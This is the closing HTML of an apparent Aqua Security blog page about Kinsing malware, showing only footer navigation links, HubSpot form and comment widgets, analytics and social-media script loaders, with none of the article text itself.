<a href="https://www.linkedin.com/company/aquasecteam" class="social_link linkedin" target="_blank" title="linkedin"></a>
<a href="https://www.youtube.com/channel/UCLstqAtOx2t0xy8YaYMjkWg" class="social_link youtube" target="_blank" title="youtube"></a>
</div>
<div class="row-fluid small">Copyright © 2021 Aqua Security Software Ltd.</div>
</div>
<div class="span3 col-md-offset-1 footer_2">
<ul>
<div id="nav_menu-2" class="widget widget_nav_menu">
<div class="widget_title">Use Cases</div>
<div class="menu-use-cases-container">
<ul id="menu-use-cases" class="menu">
<li><a href="https://www.aquasec.com/use-cases/devsecops-automation/">Automate DevSecOps</a></li>
<li><a href="https://www.aquasec.com/use-cases/container-security/">Modernize Security</a></li>
<li><a href="https://www.aquasec.com/use-cases/container-auditing-compliance/">Compliance and Auditing</a></li>
<li><a href="https://www.aquasec.com/use-cases/serverless-container-functions/">Serverless Containers &amp; Functions</a></li>
<li><a href="https://www.aquasec.com/use-cases/multi-cloud-and-hybrid-cloud/">Hybrid and Multi Cloud</a></li>
</ul>
</div>
</div>
<div id="nav_menu-9" class="widget widget_nav_menu">
<div class="widget_title">Environments</div>
<div class="menu-environments-container">
<ul id="menu-environments" class="menu">
<li><a href="https://www.aquasec.com/solutions/kubernetes-container-security/">Kubernetes Security</a></li>
<li><a href="https://www.aquasec.com/solutions/red-hat-openshift-container-security/">OpenShift Security</a></li>
<li><a href="https://www.aquasec.com/solutions/docker-container-security/">Docker Security</a></li>
<li><a href="https://www.aquasec.com/solutions/aws-container-security/">AWS Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/azure-container-security/">Azure Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/google-cloud-kubernetes-security/">Google Cloud Security</a></li>
<li><a href="https://www.aquasec.com/solutions/vmware-pks-security/">VMware PKS Security</a></li>
</ul>
</div>
</div>
<div id="nav_menu-4" class="widget widget_nav_menu">
<div class="widget_title">Contact Us</div>
<div class="menu-partners-container">
<ul id="menu-partners" class="menu">
<li><a href="https://www.aquasec.com/about-us/contact-us/">Contact Us</a></li>
<li><a href="https://success.aquasec.com/#/">Contact Support</a></li>
</ul>
</div></div>
</ul>
</div>
<div class="span3 col-xs-6 footer_3">
<ul>
<div id="nav_menu-3" class="widget widget_nav_menu">
<div class="widget_title">Products</div>
<div class="menu-products-container">
<ul id="menu-products" class="menu">
<li><a href="https://www.aquasec.com/products/aqua-cloud-native-security-platform/">Aqua Cloud native security)</a></li>
<li><a href="https://www.aquasec.com/products/open-source-projects/">Open Source Container Security</a></li>
<li><a href="https://www.aquasec.com/integrations/">Platform Integrations</a></li>
</ul>
</div>
</div>
<div id="nav_menu-8" class="widget widget_nav_menu">
<div class="widget_title">Resources</div>
<div class="menu-resources-container">
<ul id="menu-resources" class="menu">
<li><a href="https://www.aquasec.com/resources/virtual-container-security-channel/">Live Webinars</a></li>
<li><a href="https://info.aquasec.com/kubernetes-security">O’Reilly Book: Kubernetes Security</a></li>
<li><a href="https://www.aquasec.com/cloud-native-academy">Cloud native Wiki</a></li>
</ul>
</div>
</div>
<div id="nav_menu-6" class="widget widget_nav_menu">
<div class="widget_title">About Us</div>
<div class="menu-about-us-container">
<ul id="menu-about-us" class="menu">
<li><a href="https://www.aquasec.com/about-us/">About Aqua</a></li>
<li><a href="https://www.aquasec.com/about-us/news/">Newsroom</a></li>
<li><a href="https://www.aquasec.com/about-us/careers/">Careers</a></li>
</ul>
</div>
</div>
</ul>
</div>
<div class="footer_cubes"></div>
<div class="footer_wrap_top_waves"></div>
<div class="footer_wrap_sunrays"></div>
</div>
</div></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->
</div>
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end footer -->
</div><!--end footer wrapper -->

    
<script>
(function () {
    window.addEventListener('load', function () {
        setTimeout(function () {
            var xhr = new XMLHttpRequest();
            xhr.open('POST', '/_hcms/perf', true /*async*/);
            xhr.setRequestHeader("Content-type", "application/json");
            xhr.onreadystatechange = function () {
                // do nothing.
            };
            var connection = navigator.connection || navigator.mozConnection || navigator.webkitConnection;
            function populateNetworkInfo(name, connection, info) {
                if (name in connection) {
                    info[name] = connection[name];
                }
            }
            var networkInfo = {};
            if (connection) {
                ['type', 'effectiveType', 'downlink', 'rtt'].forEach(function(name) {
                    populateNetworkInfo(name, connection, networkInfo);
                });
            }
            var perfData = {
                url: location.href,
                portal: 1665891,
                content: 27901722055,
                group: -1,
                connection: networkInfo,
                timing: performance.timing
            };
            xhr.send(JSON.stringify(perfData));
        }, 3000);  // Execute this 3 seconds after onload.
    });
})();
</script>

<script src="https://blog.aquasec.com/hs-fs/hub/1665891/hub_generated/template_assets/7511165868/1575250830489/Coded_files/Custom/page/Aqua_Theme_2019/aqua_theme_2019_scripts.js"></script>
<script>
if (typeof hsVars !== 'undefined') { hsVars['language'] = 'en-us'; }
</script>

<script src="/hs/hsstatic/cos-i18n/static-1.53/bundles/project.js"></script>

    <!--[if lte IE 8]>
    <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
    <![endif]-->

<script data-hs-allowed="true" src="/_hcms/forms/v2.js"></script>

  <script data-hs-allowed="true">
      hbspt.forms.create({
          portalId: '1665891',
          formId: 'fc3a461b-474b-4bd2-b409-c41d4ec09d8a',
          formInstanceId: '1',
          pageId: '27901722055',
          region: 'na1',
          
          pageName: 'Threat Alert: Kinsing Malware Attacks Targeting Container Environments',
          
          contentType: 'blog-post',
          
          formsBaseUrl: '/_hcms/forms/',
          
          
          inlineMessage: "Thanks for Subscribing!",
          
          css: '',
          target: '#hs_form_target_module_14538258496742317_1',
          
          formData: {
            cssClass: 'hs-form stacked'
          }
      });
  </script>

<script src="/hs/hsstatic/AsyncSupport/static-1.122/js/post_listing_asset.js"></script>
<script>
  function hsOnReadyPopulateListingFeed_1248747767_1640191865846() {
    var options = {
      'id': "1248747767-1640191865846",
      'listing_url': "/_hcms/postlisting?blogId=3657573699&maxLinks=5&listingType=popular_all_time&orderByViews=true&hs-expires=1671727865&hs-version=2&hs-signature=AJ2IBuFwNrQWYcQIxhQeDVEzFDCPumD4tw",
      'include_featured_image': false
    };
    window.hsPopulateListingFeed(options);
  }

  if (document.readyState === "complete" ||
      (document.readyState !== "loading" && !document.documentElement.doScroll)
  ) {
    hsOnReadyPopulateListingFeed_1248747767_1640191865846();
  } else {
    document.addEventListener("DOMContentLoaded", hsOnReadyPopulateListingFeed_1248747767_1640191865846);
  }
</script>

<script src="/hs/hsstatic/AsyncSupport/static-1.122/js/comment_listing_asset.js"></script>
<script>
  function hsOnReadyPopulateCommentsFeed() {
    var options = {
      commentsUrl: "https://api-na1.hubapi.com/comments/v3/comments/thread/public?portalId=1665891&offset=0&limit=1000&contentId=27901722055&collectionId=3657573699",
      maxThreadDepth: 1,
      showForm: true,
      
      skipAssociateContactReason: 'blogComment',
      disableContactPromotion: true,
      
      target: "hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c"
    };
    window.hsPopulateCommentsFeed(options);
  }

  if (document.readyState === "complete" ||
      (document.readyState !== "loading" && !document.documentElement.doScroll)
  ) {
    hsOnReadyPopulateCommentsFeed();
  } else {
    document.addEventListener("DOMContentLoaded", hsOnReadyPopulateCommentsFeed);
  }

</script>


          <!--[if lte IE 8]>
          <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
          <![endif]-->
      

        <script data-hs-allowed="true">
            hbspt.forms.create({
                portalId: '1665891',
                formId: 'bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c',
                pageId: '27901722055',
                region: 'na1',
                pageName: "Threat Alert: Kinsing Malware Attacks Targeting Container Environments",
                contentType: 'blog-post',
                
                formsBaseUrl: '/_hcms/forms/',
                
                
                
                css: '',
                target: "#hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c",
                type: 'BLOG_COMMENT',
                
                submitButtonClass: 'hs-button primary',
                formInstanceId: '1',
                getExtraMetaDataBeforeSubmit: window.hsPopulateCommentFormGetExtraMetaDataBeforeSubmit
            });

            window.addEventListener('message', function(event) {
              var origin = event.origin; var data = event.data;
              if ((origin != null && (origin === 'null' || document.location.href.toLowerCase().indexOf(origin.toLowerCase()) === 0)) && data !== null && data.type === 'hsFormCallback' && data.id == 'bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c') {
                if (data.eventName === 'onFormReady') {
                  window.hsPopulateCommentFormOnFormReady({
                    successMessage: "your comment has been received.",
                    target: "#hs_form_target_bcc43e1c-30ef-4ea4-9582-44bff8d5ad4c"
                  });
                } else if (data.eventName === 'onFormSubmitted') {
                  window.hsPopulateCommentFormOnFormSubmitted();
                }
              }
            });
        </script>
      

<!-- Start of HubSpot Analytics Code -->
<script type="text/javascript">
var _hsq = _hsq || [];
_hsq.push(["setContentType", "blog-post"]);
_hsq.push(["setCanonicalUrl", "https:\/\/blog.aquasec.com\/threat-alert-kinsing-malware-container-vulnerability"]);
_hsq.push(["setPageId", "27901722055"]);
_hsq.push(["setContentMetadata", {
    "contentPageId": 27901722055,
    "legacyPageId": "27901722055",
    "contentFolderId": null,
    "contentGroupId": 3657573699,
    "abTestId": null,
    "languageVariantId": 27901722055,
    "languageCode": "en-us",
    
}]);
</script>

<script type="text/javascript" id="hs-script-loader" async defer src="/hs/scriptloader/1665891.js"></script>
<!-- End of HubSpot Analytics Code -->


<script type="text/javascript">
var hsVars = {
    ticks: 1640191865795,
    page_id: 27901722055,
    
    content_group_id: 3657573699,
    portal_id: 1665891,
    app_hs_base_url: "https://app.hubspot.com",
    cp_hs_base_url: "https://cp.hubspot.com",
    language: "en-us",
    analytics_page_type: "blog-post",
    analytics_page_id: "27901722055",
    category_id: 3,
    folder_id: 0,
    is_hubspot_user: false
}
</script>


<script defer src="/hs/hsstatic/HubspotToolsMenu/static-1.119/js/index.js"></script>

<!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5N9T3H" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->

<div id="fb-root"></div>
 <script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&status=0";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
 <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="https://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
 


    
    <!-- Generated by the HubSpot Template Builder - template version 1.03 -->

</body></html>